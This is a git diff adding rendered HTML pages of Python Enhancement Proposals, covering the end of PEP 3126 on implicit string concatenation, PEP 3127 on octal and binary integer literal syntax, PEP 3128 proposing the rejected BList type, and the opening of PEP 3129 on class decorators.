Operator Precedence

+

Guido indicated [2] that this change should be +handled by PEP, because there were a few edge cases with other string +operators, such as the %. (Assuming that str % stays – it may be +eliminated in favor of PEP 3101 – Advanced String Formatting. +[3])

+

The resolution is to use parentheses to enforce precedence – the same +solution that can be used today:

+
# Clearest, works today, continues to work, optimization is
+# already possible.
+("abc %s def" + "ghi") % var
+
+# Already works today; precedence makes the optimization more
+# difficult to recognize, but does not change the semantics.
+"abc" + "def %s ghi" % var
+
+
+

as opposed to:

+
# Already fails because modulus (%) is higher precedence than
+# addition (+)
+("abc %s def" + "ghi" % var)
+
+# Works today only because adjacency is higher precedence than
+# modulus.  This will no longer be available.
+"abc %s" "def" % var
+
+# So the 2-to-3 translator can automatically replace it with the
+# (already valid):
+("abc %s" + "def") % var
+
+
+
+
+

Long Commands

+
+
… build up (what I consider to be) readable SQL queries [4]:
rows = self.executesql("select cities.city, state, country"
+                       "    from cities, venues, events, addresses"
+                       "    where cities.city like %s"
+                       "      and events.active = 1"
+                       "      and venues.address = addresses.id"
+                       "      and addresses.city = cities.id"
+                       "      and events.venue = venues.id",
+                       (city,))
+
+
+
+

Alternatives again include triple-quoted strings, +, and .join:

+
query="""select cities.city, state, country
+             from cities, venues, events, addresses
+             where cities.city like %s
+               and events.active = 1"
+               and venues.address = addresses.id
+               and addresses.city = cities.id
+               and events.venue = venues.id"""
+
+query=( "select cities.city, state, country"
+      + "    from cities, venues, events, addresses"
+      + "    where cities.city like %s"
+      + "      and events.active = 1"
+      + "      and venues.address = addresses.id"
+      + "      and addresses.city = cities.id"
+      + "      and events.venue = venues.id"
+      )
+
+query="\n".join(["select cities.city, state, country",
+                 "    from cities, venues, events, addresses",
+                 "    where cities.city like %s",
+                 "      and events.active = 1",
+                 "      and venues.address = addresses.id",
+                 "      and addresses.city = cities.id",
+                 "      and events.venue = venues.id"])
+
+# And yes, you *could* inline any of the above querystrings
+# the same way the original was inlined.
+rows = self.executesql(query, (city,))
+
+
+
+
+

Regular Expressions

+

Complex regular expressions are sometimes stated in terms of several +implicitly concatenated strings with each regex component on a +different line and followed by a comment. The plus operator can be +inserted here but it does make the regex harder to read. One +alternative is to use the re.VERBOSE option. Another alternative is +to build-up the regex with a series of += lines:

+
# Existing idiom which relies on implicit concatenation
+r = ('a{20}'  # Twenty A's
+     'b{5}'   # Followed by Five B's
+     )
+
+# Mechanical replacement
+r = ('a{20}'  +# Twenty A's
+     'b{5}'   # Followed by Five B's
+     )
+
+# already works today
+r = '''a{20}  # Twenty A's
+       b{5}   # Followed by Five B's
+    '''                 # Compiled with the re.VERBOSE flag
+
+# already works today
+r = 'a{20}'   # Twenty A's
+r += 'b{5}'   # Followed by Five B's
+
+
+
+
+

Internationalization

+

Some internationalization tools – notably xgettext – have already +been special-cased for implicit concatenation, but not for Python’s +explicit concatenation. [5]

+

These tools will fail to extract the (already legal):

+
_("some string" +
+  " and more of it")
+
+
+

but often have a special case for:

+
_("some string"
+  " and more of it")
+
+
+

It should also be possible to just use an overly long line (xgettext +limits messages to 2048 characters [7], which is less +than Python’s enforced limit) or triple-quoted strings, but these +solutions sacrifice some readability in the code:

+
# Lines over a certain length are unpleasant.
+_("some string and more of it")
+
+# Changing whitespace is not ideal.
+_("""Some string
+     and more of it""")
+_("""Some string
+and more of it""")
+_("Some string \
+and more of it")
+
+
+

I do not see a good short-term resolution for this.

+
+
+
+

Transition

+

The proposed new constructs are already legal in current Python, and +can be used immediately.

+

The 2 to 3 translator can be made to mechanically change:

+
"str1" "str2"
+("line1"  #comment
+ "line2")
+
+
+

into:

+
("str1" + "str2")
+("line1"   +#comments
+ "line2")
+
+
+

If users want to use one of the other idioms, they can; as these +idioms are all already legal in python 2, the edits can be made +to the original source, rather than patching up the translator.

+
+
+

Open Issues

+

Is there a better way to support external text extraction tools, or at +least xgettext [6] in particular?

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3126.rst

+

Last modified: 2024-09-20 05:59:07 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3127/index.html b/pep-3127/index.html new file mode 100644 index 00000000000..5f21d625fdd --- /dev/null +++ b/pep-3127/index.html @@ -0,0 +1,601 @@ + + + + + + + + PEP 3127 – Integer Literal Support and Syntax | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3127 – Integer Literal Support and Syntax

+
+
Author:
+
Patrick Maupin <pmaupin at gmail.com>
+
Discussions-To:
+
Python-3000 list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
14-Mar-2007
+
Python-Version:
+
3.0
+
Post-History:
+
18-Mar-2007
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes changes to the Python core to rationalize +the treatment of string literal representations of integers +in different radices (bases). These changes are targeted at +Python 3.0, but the backward-compatible parts of the changes +should be added to Python 2.6, so that all valid 3.0 integer +literals will also be valid in 2.6.

+

The proposal is that:

+
    +
  1. octal literals must now be specified +with a leading “0o” or “0O” instead of “0”;
  2. +
  3. binary literals are now supported via a +leading “0b” or “0B”; and
  4. +
  5. provision will be made for binary numbers in +string formatting.
  6. +
+
+
+

Motivation

+

This PEP was motivated by two different issues:

+
    +
  • The default octal representation of integers is silently confusing +to people unfamiliar with C-like languages. It is extremely easy +to inadvertently create an integer object with the wrong value, +because ‘013’ means ‘decimal 11’, not ‘decimal 13’, to the Python +language itself, which is not the meaning that most humans would +assign to this literal.
  • +
  • Some Python users have a strong desire for binary support in +the language.
  • +
+
+
+

Specification

+
+

Grammar specification

+

The grammar will be changed. For Python 2.6, the changed and +new token definitions will be:

+
integer        ::=     decimalinteger | octinteger | hexinteger |
+                       bininteger | oldoctinteger
+
+octinteger     ::=     "0" ("o" | "O") octdigit+
+
+bininteger     ::=     "0" ("b" | "B") bindigit+
+
+oldoctinteger  ::=     "0" octdigit+
+
+bindigit       ::=     "0" | "1"
+
+
+

For Python 3.0, “oldoctinteger” will not be supported, and +an exception will be raised if a literal has a leading “0” and +a second character which is a digit.

+

For both versions, this will require changes to PyLong_FromString +as well as the grammar.

+

The documentation will have to be changed as well: grammar.txt, +as well as the integer literal section of the reference manual.

+

PEP 306 should be checked for other issues, and that PEP should +be updated if the procedure described therein is insufficient.

+
+
+

int() specification

+

int(s, 0) will also match the new grammar definition.

+

This should happen automatically with the changes to +PyLong_FromString required for the grammar change.

+

Also the documentation for int() should be changed to explain +that int(s) operates identically to int(s, 10), and the word +“guess” should be removed from the description of int(s, 0).

+
+
+

long() specification

+

For Python 2.6, the long() implementation and documentation +should be changed to reflect the new grammar.

+
+
+

Tokenizer exception handling

+

If an invalid token contains a leading “0”, the exception +error message should be more informative than the current +“SyntaxError: invalid token”. It should explain that decimal +numbers may not have a leading zero, and that octal numbers +require an “o” after the leading zero.

+
+
+

int() exception handling

+

The ValueError raised for any call to int() with a string +should at least explicitly contain the base in the error +message, e.g.:

+
ValueError: invalid literal for base 8 int(): 09
+
+
+
+
+

oct() function

+

oct() should be updated to output ‘0o’ in front of +the octal digits (for 3.0, and 2.6 compatibility mode).

+
+
+

Output formatting

+

In 3.0, the string % operator alternate syntax for the ‘o’ +option will need to be updated to add ‘0o’ in front, +instead of ‘0’. In 2.6, alternate octal formatting will +continue to add only ‘0’. In neither 2.6 nor 3.0 will +the % operator support binary output. This is because +binary output is already supported by PEP 3101 +(str.format), which is the preferred string formatting +method.

+
+
+

Transition from 2.6 to 3.0

+

The 2to3 translator will have to insert ‘o’ into any +octal string literal.

+

The Py3K compatible option to Python 2.6 should cause +attempts to use oldoctinteger literals to raise an +exception.

+
+
+
+

Rationale

+

Most of the discussion on these issues occurred on the Python-3000 +mailing list starting 14-Mar-2007, prompted by an observation that +the average human being would be completely mystified upon finding +that prepending a “0” to a string of digits changes the meaning of +that digit string entirely.

+

It was pointed out during this discussion that a similar, but shorter, +discussion on the subject occurred in January 2006, prompted by a +discovery of the same issue.

+
+

Background

+

For historical reasons, Python’s string representation of integers +in different bases (radices), for string formatting and token +literals, borrows heavily from C. [1] [2] Usage has shown that +the historical method of specifying an octal number is confusing, +and also that it would be nice to have additional support for binary +literals.

+

Throughout this document, unless otherwise noted, discussions about +the string representation of integers relate to these features:

+
    +
  • Literal integer tokens, as used by normal module compilation, +by eval(), and by int(token, 0). (int(token) and int(token, 2-36) +are not modified by this proposal.)
      +
    • Under 2.6, long() is treated the same as int()
    • +
    +
  • +
  • Formatting of integers into strings, either via the % string +operator or the new PEP 3101 advanced string formatting method.
  • +
+

It is presumed that:

+
    +
  • All of these features should have an identical set +of supported radices, for consistency.
  • +
  • Python source code syntax and int(mystring, 0) should +continue to share identical behavior.
  • +
+
+
+

Removal of old octal syntax

+

This PEP proposes that the ability to specify an octal number by +using a leading zero will be removed from the language in Python 3.0 +(and the Python 3.0 preview mode of 2.6), and that a SyntaxError will +be raised whenever a leading “0” is immediately followed by another +digit.

+

During the present discussion, it was almost universally agreed that:

+
eval('010') == 8
+
+
+

should no longer be true, because that is confusing to new users. +It was also proposed that:

+
eval('0010') == 10
+
+
+

should become true, but that is much more contentious, because it is so +inconsistent with usage in other computer languages that mistakes are +likely to be made.

+

Almost all currently popular computer languages, including C/C++, +Java, Perl, and JavaScript, treat a sequence of digits with a +leading zero as an octal number. Proponents of treating these +numbers as decimal instead have a very valid point – as discussed +in Supported radices, below, the entire non-computer world uses +decimal numbers almost exclusively. There is ample anecdotal +evidence that many people are dismayed and confused if they +are confronted with non-decimal radices.

+

However, in most situations, most people do not write gratuitous +zeros in front of their decimal numbers. The primary exception is +when an attempt is being made to line up columns of numbers. But +since PEP 8 specifically discourages the use of spaces to try to +align Python code, one would suspect the same argument should apply +to the use of leading zeros for the same purpose.

+

Finally, although the email discussion often focused on whether anybody +actually uses octal any more, and whether we should cater to those +old-timers in any case, that is almost entirely besides the point.

+

Assume the rare complete newcomer to computing who does, either +occasionally or as a matter of habit, use leading zeros for decimal +numbers. Python could either:

+
    +
  1. silently do the wrong thing with their numbers, as it does now;
  2. +
  3. immediately disabuse them of the notion that this is viable syntax +(and yes, the SyntaxWarning should be more gentle than it +currently is, but that is a subject for a different PEP); or
  4. +
  5. let them continue to think that computers are happy with +multi-digit decimal integers which start with “0”.
  6. +
+

Some people passionately believe that (c) is the correct answer, +and they would be absolutely right if we could be sure that new +users will never blossom and grow and start writing AJAX applications.

+

So while a new Python user may (currently) be mystified at the +delayed discovery that their numbers don’t work properly, we can +fix it by explaining to them immediately that Python doesn’t like +leading zeros (hopefully with a reasonable message!), or we can +delegate this teaching experience to the JavaScript interpreter +in the browser, and let them try to debug their issue there.

+
+
+

Supported radices

+

This PEP proposes that the supported radices for the Python +language will be 2, 8, 10, and 16.

+

Once it is agreed that the old syntax for octal (radix 8) representation +of integers must be removed from the language, the next obvious +question is “Do we actually need a way to specify (and display) +numbers in octal?”

+

This question is quickly followed by “What radices does the language +need to support?” Because computers are so adept at doing what you +tell them to, a tempting answer in the discussion was “all of them.” +This answer has obviously been given before – the int() constructor +will accept an explicit radix with a value between 2 and 36, inclusive, +with the latter number bearing a suspicious arithmetic similarity to +the sum of the number of numeric digits and the number of same-case +letters in the ASCII alphabet.

+

But the best argument for inclusion will have a use-case to back +it up, so the idea of supporting all radices was quickly rejected, +and the only radices left with any real support were decimal, +hexadecimal, octal, and binary.

+

Just because a particular radix has a vocal supporter on the +mailing list does not mean that it really should be in the +language, so the rest of this section is a treatise on the +utility of these particular radices, vs. other possible choices.

+

Humans use other numeric bases constantly. If I tell you that +it is 12:30 PM, I have communicated quantitative information +arguably composed of three separate bases (12, 60, and 2), +only one of which is in the “agreed” list above. But the +communication of that information used two decimal digits +each for the base 12 and base 60 information, and, perversely, +two letters for information which could have fit in a single +decimal digit.

+

So, in general, humans communicate “normal” (non-computer) +numerical information either via names (AM, PM, January, …) +or via use of decimal notation. Obviously, names are +seldom used for large sets of items, so decimal is used for +everything else. There are studies which attempt to explain +why this is so, typically reaching the expected conclusion +that the Arabic numeral system is well-suited to human +cognition. [3]

+

There is even support in the history of the design of +computers to indicate that decimal notation is the correct +way for computers to communicate with humans. One of +the first modern computers, ENIAC [4] computed in decimal, +even though there were already existing computers which +operated in binary.

+

Decimal computer operation was important enough +that many computers, including the ubiquitous PC, have +instructions designed to operate on “binary coded decimal” +(BCD) [5], a representation which devotes 4 bits to each +decimal digit. These instructions date from a time when the +most strenuous calculations ever performed on many numbers +were the calculations actually required to perform textual +I/O with them. It is possible to display BCD without having +to perform a divide/remainder operation on every displayed +digit, and this was a huge computational win when most +hardware didn’t have fast divide capability. Another factor +contributing to the use of BCD is that, with BCD calculations, +rounding will happen exactly the same way that a human would +do it, so BCD is still sometimes used in fields like finance, +despite the computational and storage superiority of binary.

+

So, if it weren’t for the fact that computers themselves +normally use binary for efficient computation and data +storage, string representations of integers would probably +always be in decimal.

+

Unfortunately, computer hardware doesn’t think like humans, +so programmers and hardware engineers must often resort to +thinking like the computer, which means that it is important +for Python to have the ability to communicate binary data +in a form that is understandable to humans.

+

The requirement that the binary data notation must be cognitively +easy for humans to process means that it should contain an integral +number of binary digits (bits) per symbol, while otherwise +conforming quite closely to the standard tried-and-true decimal +notation (position indicates power, larger magnitude on the left, +not too many symbols in the alphabet, etc.).

+

The obvious “sweet spot” for this binary data notation is +thus octal, which packs the largest integral number of bits +possible into a single symbol chosen from the Arabic numeral +alphabet.

+

In fact, some computer architectures, such as the PDP8 and the +8080/Z80, were defined in terms of octal, in the sense of arranging +the bitfields of instructions in groups of three, and using +octal representations to describe the instruction set.

+

Even today, octal is important because of bit-packed structures +which consist of 3 bits per field, such as Unix file permission +masks.

+

But octal has a drawback when used for larger numbers. The +number of bits per symbol, while integral, is not itself +a power of two. This limitation (given that the word size +of most computers these days is a power of two) has resulted +in hexadecimal, which is more popular than octal despite the +fact that it requires a 60% larger alphabet than decimal, +because each symbol contains 4 bits.

+

Some numbers, such as Unix file permission masks, are easily +decoded by humans when represented in octal, but difficult to +decode in hexadecimal, while other numbers are much easier for +humans to handle in hexadecimal.

+

Unfortunately, there are also binary numbers used in computers +which are not very well communicated in either hexadecimal or +octal. Thankfully, fewer people have to deal with these on a +regular basis, but on the other hand, this means that several +people on the discussion list questioned the wisdom of adding +a straight binary representation to Python.

+

One example of where these numbers is very useful is in +reading and writing hardware registers. Sometimes hardware +designers will eschew human readability and opt for address +space efficiency, by packing multiple bit fields into a single +hardware register at unaligned bit locations, and it is tedious +and error-prone for a human to reconstruct a 5 bit field which +consists of the upper 3 bits of one hex digit, and the lower 2 +bits of the next hex digit.

+

Even if the ability of Python to communicate binary information +to humans is only useful for a small technical subset of the +population, it is exactly that population subset which contains +most, if not all, members of the Python core team, so even straight +binary, the least useful of these notations, has several enthusiastic +supporters and few, if any, staunch opponents, among the Python community.

+
+
+

Syntax for supported radices

+

This proposal is to use a “0o” prefix with either uppercase +or lowercase “o” for octal, and a “0b” prefix with either +uppercase or lowercase “b” for binary.

+

There was strong support for not supporting uppercase, but +this is a separate subject for a different PEP, as ‘j’ for +complex numbers, ‘e’ for exponent, and ‘r’ for raw string +(to name a few) already support uppercase.

+

The syntax for delimiting the different radices received a lot of +attention in the discussion on Python-3000. There are several +(sometimes conflicting) requirements and “nice-to-haves” for +this syntax:

+
    +
  • It should be as compatible with other languages and +previous versions of Python as is reasonable, both +for the input syntax and for the output (e.g. string +% operator) syntax.
  • +
  • It should be as obvious to the casual observer as +possible.
  • +
  • It should be easy to visually distinguish integers +formatted in the different bases.
  • +
+

Proposed syntaxes included things like arbitrary radix prefixes, +such as 16r100 (256 in hexadecimal), and radix suffixes, similar +to the 100h assembler-style suffix. The debate on whether the +letter “O” could be used for octal was intense – an uppercase +“O” looks suspiciously similar to a zero in some fonts. Suggestions +were made to use a “c” (the second letter of “oCtal”), or even +to use a “t” for “ocTal” and an “n” for “biNary” to go along +with the “x” for “heXadecimal”.

+

For the string % operator, “o” was already being used to denote +octal. Binary formatting is not being added to the % operator +because PEP 3101 (Advanced String Formatting) already supports +binary, % formatting will be deprecated in the future.

+

At the end of the day, since uppercase “O” can look like a zero +and uppercase “B” can look like an 8, it was decided that these +prefixes should be lowercase only, but, like ‘r’ for raw string, +that can be a preference or style-guide issue.

+
+
+
+

Open Issues

+

It was suggested in the discussion that lowercase should be used +for all numeric and string special modifiers, such as ‘x’ for +hexadecimal, ‘r’ for raw strings, ‘e’ for exponentiation, and +‘j’ for complex numbers. This is an issue for a separate PEP.

+

This PEP takes no position on uppercase or lowercase for input, +just noting that, for consistency, if uppercase is not to be +removed from input parsing for other letters, it should be +added for octal and binary, and documenting the changes under +this assumption, as there is not yet a PEP about the case issue.

+

Output formatting may be a different story – there is already +ample precedence for case sensitivity in the output format string, +and there would need to be a consensus that there is a valid +use-case for the “alternate form” of the string % operator +to support uppercase ‘B’ or ‘O’ characters for binary or +octal output. Currently, PEP 3101 does not even support this +alternate capability, and the hex() function does not allow +the programmer to specify the case of the ‘x’ character.

+

There are still some strong feelings that ‘0123’ should be +allowed as a literal decimal in Python 3.0. If this is the +right thing to do, this can easily be covered in an additional +PEP. This proposal only takes the first step of making ‘0123’ +not be a valid octal number, for reasons covered in the rationale.

+

Is there (or should there be) an option for the 2to3 translator +which only makes the 2.6 compatible changes? Should this be +run on 2.6 library code before the 2.6 release?

+

Should a bin() function which matches hex() and oct() be added?

+

Is hex() really that useful once we have advanced string formatting?

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3127.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3128/index.html b/pep-3128/index.html new file mode 100644 index 00000000000..187957fb7b6 --- /dev/null +++ b/pep-3128/index.html @@ -0,0 +1,543 @@ + + + + + + + + PEP 3128 – BList: A Faster List-like Type | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3128 – BList: A Faster List-like Type

+
+
Author:
+
Daniel Stutzbach <daniel at stutzbachenterprises.com>
+
Discussions-To:
+
Python-3000 list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
30-Apr-2007
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+
30-Apr-2007
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

Rejected based on Raymond Hettinger’s sage advice [4]:

+
+
After looking at the source, I think this has almost zero chance +for replacing list(). There is too much value in a simple C API, +low space overhead for small lists, good performance is common use +cases, and having performance that is easily understood. The +BList implementation lacks these virtues and it trades-off a little +performance in common cases in for much better performance in +uncommon cases. As a Py3.0 PEP, I think it can be rejected.

Depending on its success as a third-party module, it still has a +chance for inclusion in the collections module. The essential +criteria for that is whether it is a superior choice for some +real-world use cases. I’ve scanned my own code and found no instances +where BList would have been preferable to a regular list. However, +that scan has a selection bias because it doesn’t reflect what I would +have written had BList been available. So, after a few months, I +intend to poll comp.lang.python for BList success stories. If they +exist, then I have no problem with inclusion in the collections +module. After all, its learning curve is near zero – the only cost +is the clutter factor stemming from indecision about the most +appropriate data structure for a given task.

+
+
+
+

Abstract

+

The common case for list operations is on small lists. The current +array-based list implementation excels at small lists due to the +strong locality of reference and infrequency of memory allocation +operations. However, an array takes O(n) time to insert and delete +elements, which can become problematic as the list gets large.

+

This PEP introduces a new data type, the BList, that has array-like +and tree-like aspects. It enjoys the same good performance on small +lists as the existing array-based implementation, but offers superior +asymptotic performance for most operations. This PEP proposes +replacing the makes two mutually exclusive proposals for including the +BList type in Python:

+
    +
  1. Add it to the collections module, or
  2. +
  3. Replace the existing list type
  4. +
+
+
+

Motivation

+

The BList grew out of the frustration of needing to rewrite intuitive +algorithms that worked fine for small inputs but took O(n**2) time for +large inputs due to the underlying O(n) behavior of array-based lists. +The deque type, introduced in Python 2.4, solved the most common +problem of needing a fast FIFO queue. However, the deque type doesn’t +help if we need to repeatedly insert or delete elements from the +middle of a long list.

+

A wide variety of data structure provide good asymptotic performance +for insertions and deletions, but they either have O(n) performance +for other operations (e.g., linked lists) or have inferior performance +for small lists (e.g., binary trees and skip lists).

+

The BList type proposed in this PEP is based on the principles of +B+Trees, which have array-like and tree-like aspects. The BList +offers array-like performance on small lists, while offering O(log n) +asymptotic performance for all insert and delete operations. +Additionally, the BList implements copy-on-write under-the-hood, so +even operations like getslice take O(log n) time. The table below +compares the asymptotic performance of the current array-based list +implementation with the asymptotic performance of the BList.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
OperationArray-based listBList
CopyO(n)O(1)
AppendO(1)O(log n)
InsertO(n)O(log n)
Get ItemO(1)O(log n)
Set ItemO(1)O(log n)
Del ItemO(n)O(log n)
IterationO(n)O(n)
Get SliceO(k)O(log n)
Del SliceO(n)O(log n)
Set SliceO(n+k)O(log k + log n)
ExtendO(k)O(log k + log n)
SortO(n log n)O(n log n)
MultiplyO(nk)O(log k)
+

An extensive empirical comparison of Python’s array-based list and the +BList are available at [2].

+
+
+

Use Case Trade-offs

+

The BList offers superior performance for many, but not all, +operations. Choosing the correct data type for a particular use case +depends on which operations are used. Choosing the correct data type +as a built-in depends on balancing the importance of different use +cases and the magnitude of the performance differences.

+

For the common uses cases of small lists, the array-based list and the +BList have similar performance characteristics.

+

For the slightly less common case of large lists, there are two common +uses cases where the existing array-based list outperforms the +existing BList reference implementation. These are:

+
    +
  1. A large LIFO stack, where there are many .append() and .pop(-1) +operations. Each operation is O(1) for an array-based list, but +O(log n) for the BList.
  2. +
  3. A large list that does not change size. The getitem and setitem +calls are O(1) for an array-based list, but O(log n) for the BList.
  4. +
+

In performance tests on a 10,000 element list, BLists exhibited a 50% +and 5% increase in execution time for these two uses cases, +respectively.

+

The performance for the LIFO use case could be improved to O(n) time, +by caching a pointer to the right-most leaf within the root node. For +lists that do not change size, the common case of sequential access +could also be improved to O(n) time via caching in the root node. +However, the performance of these approaches has not been empirically +tested.

+

Many operations exhibit a tremendous speed-up (O(n) to O(log n)) when +switching from the array-based list to BLists. In performance tests +on a 10,000 element list, operations such as getslice, setslice, and +FIFO-style insert and deletes on a BList take only 1% of the time +needed on array-based lists.

+

In light of the large performance speed-ups for many operations, the +small performance costs for some operations will be worthwhile for +many (but not all) applications.

+
+
+

Implementation

+

The BList is based on the B+Tree data structure. The BList is a wide, +bushy tree where each node contains an array of up to 128 pointers to +its children. If the node is a leaf, its children are the +user-visible objects that the user has placed in the list. If node is +not a leaf, its children are other BList nodes that are not +user-visible. If the list contains only a few elements, they will all +be a children of single node that is both the root and a leaf. Since +a node is little more than array of pointers, small lists operate in +effectively the same way as an array-based data type and share the +same good performance characteristics.

+

The BList maintains a few invariants to ensure good (O(log n)) +asymptotic performance regardless of the sequence of insert and delete +operations. The principle invariants are as follows:

+
    +
  1. Each node has at most 128 children.
  2. +
  3. Each non-root node has at least 64 children.
  4. +
  5. The root node has at least 2 children, unless the list contains +fewer than 2 elements.
  6. +
  7. The tree is of uniform depth.
  8. +
+

If an insert would cause a node to exceed 128 children, the node +spawns a sibling and transfers half of its children to the sibling. +The sibling is inserted into the node’s parent. If the node is the +root node (and thus has no parent), a new parent is created and the +depth of the tree increases by one.

+

If a deletion would cause a node to have fewer than 64 children, the +node moves elements from one of its siblings if possible. If both of +its siblings also only have 64 children, then two of the nodes merge +and the empty one is removed from its parent. If the root node is +reduced to only one child, its single child becomes the new root +(i.e., the depth of the tree is reduced by one).

+

In addition to tree-like asymptotic performance and array-like +performance on small-lists, BLists support transparent +copy-on-write. If a non-root node needs to be copied (as part of +a getslice, copy, setslice, etc.), the node is shared between multiple +parents instead of being copied. If it needs to be modified later, it +will be copied at that time. This is completely behind-the-scenes; +from the user’s point of view, the BList works just like a regular +Python list.

+
+
+

Memory Usage

+

In the worst case, the leaf nodes of a BList have only 64 children +each, rather than a full 128, meaning that memory usage is around +twice that of a best-case array implementation. Non-leaf nodes use up +a negligible amount of additional memory, since there are at least 63 +times as many leaf nodes as non-leaf nodes.

+

The existing array-based list implementation must grow and shrink as +items are added and removed. To be efficient, it grows and shrinks +only when the list has grow or shrunk exponentially. In the worst +case, it, too, uses twice as much memory as the best case.

+

In summary, the BList’s memory footprint is not significantly +different from the existing array-based implementation.

+
+
+

Backwards Compatibility

+

If the BList is added to the collections module, backwards +compatibility is not an issue. This section focuses on the option of +replacing the existing array-based list with the BList. For users of +the Python interpreter, a BList has an identical interface to the +current list-implementation. For virtually all operations, the +behavior is identical, aside from execution speed.

+

For the C API, BList has a different interface than the existing +list-implementation. Due to its more complex structure, the BList +does not lend itself well to poking and prodding by external sources. +Thankfully, the existing list-implementation defines an API of +functions and macros for accessing data from list objects. Google +Code Search suggests that the majority of third-party modules uses the +well-defined API rather than relying on the list’s structure +directly. The table below summarizes the search queries and results:

+ + + + + + + + + + + + + + + + + + + + + + + +
Search StringNumber of Results
PyList_GetItem2,000
PySequence_GetItem800
PySequence_Fast_GET_ITEM100
PyList_GET_ITEM400
[^a-zA-Z_]ob_item100
+

This can be achieved in one of two ways:

+
    +
  1. Redefine the various accessor functions and macros in listobject.h +to access a BList instead. The interface would be unchanged. The +functions can easily be redefined. The macros need a bit more care +and would have to resort to function calls for large lists.

    The macros would need to evaluate their arguments more than once, +which could be a problem if the arguments have side effects. A +Google Code Search for “PyList_GET_ITEM([^)]+(” found only a +handful of cases where this occurs, so the impact appears to be +low.

    +

    The few extension modules that use list’s undocumented structure +directly, instead of using the API, would break. The core code +itself uses the accessor macros fairly consistently and should be +easy to port.

    +
  2. +
  3. Deprecate the existing list type, but continue to include it. +Extension modules wishing to use the new BList type must do so +explicitly. The BList C interface can be changed to match the +existing PyList interface so that a simple search-replace will be +sufficient for 99% of module writers.

    Existing modules would continue to compile and work without change, +but they would need to make a deliberate (but small) effort to +migrate to the BList.

    +

    The downside of this approach is that mixing modules that use +BLists and array-based lists might lead to slow down if conversions +are frequently necessary.

    +
  4. +
+
+
+

Reference Implementation

+

A reference implementations of the BList is available for CPython at [1].

+

The source package also includes a pure Python implementation, +originally developed as a prototype for the CPython version. +Naturally, the pure Python version is rather slow and the asymptotic +improvements don’t win out until the list is quite large.

+

When compiled with Py_DEBUG, the C implementation checks the +BList invariants when entering and exiting most functions.

+

An extensive set of test cases is also included in the source package. +The test cases include the existing Python sequence and list test +cases as a subset. When the interpreter is built with Py_DEBUG, the +test cases also check for reference leaks.

+
+

Porting to Other Python Variants

+

If the BList is added to the collections module, other Python variants +can support it in one of three ways:

+
    +
  1. Make blist an alias for list. The asymptotic performance won’t be +as good, but it’ll work.
  2. +
  3. Use the pure Python reference implementation. The performance for +small lists won’t be as good, but it’ll work.
  4. +
  5. Port the reference implementation.
  6. +
+
+
+
+

Discussion

+

This proposal has been discussed briefly on the Python-3000 mailing +list [3]. Although a number of people favored the proposal, there +were also some objections. Below summarizes the pros and cons as +observed by posters to the thread.

+

General comments:

+
    +
  • Pro: Will outperform the array-based list in most cases
  • +
  • Pro: “I’ve implemented variants of this … a few different times”
  • +
  • Con: Desirability and performance in actual applications is unproven
  • +
+

Comments on adding BList to the collections module:

+
    +
  • Pro: Matching the list-API reduces the learning curve to near-zero
  • +
  • Pro: Useful for intermediate-level users; won’t get in the way of beginners
  • +
  • Con: Proliferation of data types makes the choices for developers harder.
  • +
+

Comments on replacing the array-based list with the BList:

+
    +
  • Con: Impact on extension modules (addressed in Backwards +Compatibility)
  • +
  • Con: The use cases where BLists are slower are important +(see Use Case Trade-Offs for how these might be addressed).
  • +
  • Con: The array-based list code is simple and easy to maintain
  • +
+

To assess the desirability and performance in actual applications, +Raymond Hettinger suggested releasing the BList as an extension module +(now available at [1]). If it proves useful, he felt it would be a +strong candidate for inclusion in 2.6 as part of the collections +module. If widely popular, then it could be considered for replacing +the array-based list, but not otherwise.

+

Guido van Rossum commented that he opposed the proliferation of data +types, but favored replacing the array-based list if backwards +compatibility could be addressed and the BList’s performance was +uniformly better.

+
+
+

On-going Tasks

+
    +
  • Reduce the memory footprint of small lists
  • +
  • Implement TimSort for BLists, so that best-case sorting is O(n) +instead of O(log n).
  • +
  • Implement __reversed__
  • +
  • Cache a pointer in the root to the rightmost leaf, to make LIFO +operation O(n) time.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3128.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3129/index.html b/pep-3129/index.html new file mode 100644 index 00000000000..7a9b31f47a1 --- /dev/null +++ b/pep-3129/index.html @@ -0,0 +1,232 @@ + + + + + + + + PEP 3129 – Class Decorators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3129 – Class Decorators

+
+
Author:
+
Collin Winter <collinwinter at google.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-May-2007
+
Python-Version:
+
3.0
+
Post-History:
+
07-May-2007
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes class decorators, an extension to the function +and method decorators introduced in PEP 318.

+
+
+

Rationale

+

When function decorators were originally debated for inclusion in +Python 2.4, class decorators were seen as +obscure and unnecessary +thanks to metaclasses. After several years’ experience +with the Python 2.4.x series of releases and an increasing +familiarity with function decorators and their uses, the BDFL and +the community re-evaluated class decorators and recommended their +inclusion in Python 3.0 [1].

+

